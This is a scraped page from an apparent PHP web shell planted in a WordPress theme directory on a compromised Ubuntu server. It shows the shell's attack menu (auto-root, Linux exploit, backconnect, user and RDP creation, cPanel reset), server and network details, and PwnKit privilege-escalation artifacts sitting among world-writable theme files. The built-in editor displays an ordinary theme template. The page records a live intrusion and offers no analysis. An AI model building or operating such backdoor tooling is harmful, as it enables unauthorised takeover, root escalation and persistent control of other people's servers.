Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
blog /
wp-content /
themes /
baskerville /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxrwxrwx
js
[ DIR ]
drwxrwxrwx
languages
[ DIR ]
drwxrwxrwx
widgets
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-r--r--
404.php
1014
B
-rw-rw-rw-
archive.php
2.31
KB
-rw-rw-rw-
baskerville-editor-style.css
3.08
KB
-rw-rw-rw-
baskerville-gutenberg-editor-s...
7.72
KB
-rw-rw-rw-
comments.php
2.17
KB
-rw-rw-rw-
content-aside.php
257
B
-rw-rw-rw-
content-audio.php
902
B
-rw-rw-rw-
content-gallery.php
954
B
-rw-rw-rw-
content-image.php
960
B
-rw-rw-rw-
content-link.php
1.14
KB
-rw-rw-rw-
content-quote.php
1006
B
-rw-rw-rw-
content-status.php
156
B
-rw-rw-rw-
content-video.php
1.17
KB
-rw-rw-rw-
content.php
880
B
-rw-rw-rw-
footer.php
1.98
KB
-rw-rw-rw-
functions.php
25.1
KB
-rw-rw-rw-
header.php
3.5
KB
-rw-rw-rw-
image.php
2.01
KB
-rw-rw-rw-
index.php
1.62
KB
-rw-rw-rw-
license.txt
15.05
KB
-rw-rw-rw-
page.php
1.68
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rwxr-xr-x
readme.txt
10.71
KB
-rw-rw-rw-
screenshot.png
310.95
KB
-rw-rw-rw-
search.php
1.55
KB
-rw-rw-rw-
searchform.php
302
B
-rw-rw-rw-
sidebar.php
1.67
KB
-rw-rw-rw-
single.php
8.31
KB
-rw-rw-rw-
style.css
64.62
KB
-rw-rw-rw-
template-archives.php
4.51
KB
-rw-rw-rw-
template-contributors.php
3.66
KB
-rw-rw-rw-
template-fullwidth.php
1.56
KB
-rw-rw-rw-
template-nosidebar.php
1.57
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : template-contributors.php
<?php /* Template Name: Contributors template */ $all_users = get_users( 'orderby=post_count&order=DESC' ); $user_num = 0; $users = array(); foreach ( $all_users as $user_obj ) { if ( ! in_array( 'subscriber', $user_obj->roles ) // If the user isn't a subscriber... && ( ! count_user_posts( $user_obj->ID ) == 0 ) // ...and the user has published one post or more... && ( ! $user_obj->hideauthor == "yes" ) ) { // ...and the user hasn't been checked as hidden on the user profile... $users[] = $user_obj; // ...add the user to the array of users that is going to be displayed } } ?> <?php get_header(); ?> <div class="wrapper section medium-padding"> <div class="section-inner"> <div class="content fleft"> <div <?php post_class('single post'); ?>> <?php if ( have_posts() ) : while ( have_posts() ) : the_post(); ?> <div class="post-header"> <?php the_title( '<h1 class="post-title">', '</h1>' ); ?> </div><!-- .post-header --> <div class="post-content"> <?php the_content(); ?> </div><!-- .post-content --> <div class="contributors-container"> <?php $i = 0; foreach( $users as $user ) { if ( $i % 2 == 0 ) { echo $i > 0 ? "<div class='clear'></div></div>" : ""; // close div if it's not the first echo "<div class='authors-row row'>"; } ?> <div class="one-half author-info"> <a href="<?php echo get_author_posts_url( $user->ID ); ?>" class="author-avatar"><?php echo get_avatar( $user->user_email, '256' ); ?></a> <h4><a href="<?php echo get_author_posts_url( $user->ID ); ?>"><?php echo $user->display_name; ?></a></h4> <h5> <a href="<?php echo get_author_posts_url( $user->ID ); ?>"> <?php $user_posts_count = count_user_posts( $user->ID ); printf( _n( '%s post', '%s posts', $user_posts_count, 'baskerville' ), $user_posts_count ); ?> </a> </h5> <div class="author-description"> <?php echo wpautop( get_user_meta( $user->ID, 'description', true ) ); ?> </div> <div class="author-links"> <?php $show_mail = get_the_author_meta( 'showemail' ); if ( ! empty( $author_mail ) && ( $show_mail == "yes" ) ) : ?> <a class="author-link-mail" href="mailto:<?php echo $user->user_email; ?>"><?php _e( 'E-mail', 'baskerville' ); ?></a> <?php endif; ?> <?php if ( ! empty($user->user_url) ) : ?> <a class="author-link-website" href="<?php echo $user->user_url; ?>"><?php _e( 'Website', 'baskerville' ); ?></a> <?php endif; ?> <?php if ( ! empty($user->twitter) ) : ?> <a class="author-link-twitter" href="http://www.twitter.com/<?php echo $user->twitter; ?>"><?php _e( 'Twitter', 'baskerville' ); ?></a> <?php endif; ?> </div><!-- .author-links --> </div><!-- .author-info --> <?php $i++; ?> <?php } ?> <div class="clear"></div> </div><!-- .authors-row --> </div><!-- .contributors-container --> <?php comments_template( '', true ); ?> <?php endwhile; endif; ?> </div><!-- .post --> </div><!-- .content --> <?php get_sidebar(); ?> <div class="clear"></div> </div><!-- .section-inner --> </div><!-- .wrapper --> <?php get_footer(); ?>
Close